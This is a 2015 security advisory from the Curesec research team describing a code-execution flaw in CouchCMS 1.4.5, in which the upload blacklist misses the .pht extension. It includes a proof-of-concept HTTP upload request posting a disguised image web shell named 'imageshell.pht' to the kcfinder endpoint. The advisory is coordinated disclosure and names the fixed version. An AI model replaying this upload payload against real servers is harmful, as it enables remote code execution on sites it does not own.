CouchCMS 1.4.5: Code Execution

CouchCMS 1.4.5: Code Execution

Date: 2015-12-21 10:28:55
Security Advisory – Curesec Research Team

1. Introduction

Affected Product: CouchCMS 1.4.5
Fixed in: 1.4.7
Fixed Version Link:
Vendor Website:
Vulnerability Type: Code Execution
Remote Exploitable: Yes
Reported to vendor: 11/17/2015
Disclosed to public: 12/21/2015
Release mode: Coordinated Release
CVE: n/a
Credits Tim Coen of curesec GmbH

2. Overview


High 8.5 AV:N/AC:M/Au:S/C:C/I:C/A:C


When uploading a file, the file extension is checked against a blacklist. This blacklist misses at the least pht, which is executed by most default Apache configurations. The uploaded file must be a valid image file, but an attacker can bypass this restriction.

Admin credentials are required to upload files.

A htaccess file forbids the execution of PHP code in uploaded files, but some servers are configured to not read htaccess files, for example for performance reasons. Apache for example ignores htaccess files by default since version 2.3.9.

3. Proof of Concept

POST /CouchCMS-1.4.5/couch/includes/kcfinder/browse.php?type=image&lng=en&act=upload&nonce=1abb096565d868f94f727f600e8c4f61 HTTP/1.1 Host: localhost Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------18851501621445926637695954351 Content-Length: 529 -----------------------------18851501621445926637695954351 Content-Disposition: form-data; name="upload[]"; filename="imageshell.pht" Content-Type: application/octet-stream [base64: iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAIAAAD8GO2jAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAAYElEQVRIiWNcPD89JF9HRVRbMF0oJF9QT1NUWzFdKTs/PliAgYHBc143k/yPi9t+X9N9qif38ePJv1/vBnyyMDBj2bln/dk9G84yjIJRMApGwSgYBaNgFIyCUTAKhg0AAIGyGwIHeA0MAAAAAElFTkSuQmCC]
The shellcode used can be found here:

4. Solution

To mitigate this issue please upgrade at least to version 1.4.7:

Please note that a newer version might already be available.

5. Report Timeline

11/17/2015 Informed Vendor about Issue
11/18/2015 Vendor sends fixes for confirmation
11/20/2015 Verified fixes
11/24/2015 Vendor releases fix
12/21/2015 Disclosed to public